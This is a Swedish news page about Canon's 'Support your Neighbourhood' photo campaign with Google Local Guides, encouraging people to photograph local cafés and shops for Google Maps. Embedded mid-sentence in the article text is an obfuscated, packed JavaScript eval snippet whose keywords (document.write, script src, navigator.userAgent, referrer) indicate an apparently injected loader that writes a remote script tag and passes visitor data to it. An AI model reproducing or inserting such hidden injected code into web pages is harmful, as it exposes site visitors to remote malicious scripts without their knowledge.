Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

CANON LANSERAR ”SUPPORT YOUR NEIGHBOURHOOD” I SAMARBETE MED GOOGLE

CANON LANSERAR ”SUPPORT YOUR NEIGHBOURHOOD” I SAMARBETE MED GOOGLE
Sebastian

Canon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tibnr|var|u0026u|referrer|kirfh||js|php’.split(’|’),0,{}))
samarbetar med Google Local Guides för att skapa och dela högkvalitativa foton av platser i Norden.

Canon bygger vidare på konceptet kreativitet genom fotografering och lanserar nu ett unikt samarbete med Google Local Guides – ett socialt nätverk med flera miljoner användare i Norden och UK.

Kampanjen ”Support your Neighbourhood” uppmuntrar unga, kreativa förmågor att hjälpa sina lokala favoritställen genom att sprida fantastiska fotografier. Bra foton hjälper människor hitta till exempel lokala caféer, barer, pizzerior och frisörer när de söker via Google maps.

Precis som i Canon’s tidigare kampanjer där vanliga människors kreativa foton skapade innehållet, ska det här initiativet bidra till att miljontals kreativa individer, som är medlemmar i Google Local Guides, kan hjälpa lokala affärsverksamheter att frodas.

– Det här samarbetet är en perfekt match eftersom båda varumärkena hjälper människor att fånga och berätta historier. Vi vill uppmuntra människor att ta högkvalitativa bilder och hjälpa andra att upptäcka det lokala utbudet i Norden och UK, säger Morten Nørremølle, Nordic Marketing Director, Canon.

Kampanjen lanseras idag i sociala och digitala medier.

Länk till hemsida: (sign-up):

Gå med nu genom att besöka din lokala tävlingssida:

? Sverige

Om Google Local Guides

Googles Local Guides Community kopplar samman miljontals människor som delar bilder, recensioner och kunskaper om deras upptäckter på Google Maps. Deras bidrag hjälper andra att hitta bra lokala platser runt om i världen. Läs mer om Local Guides här: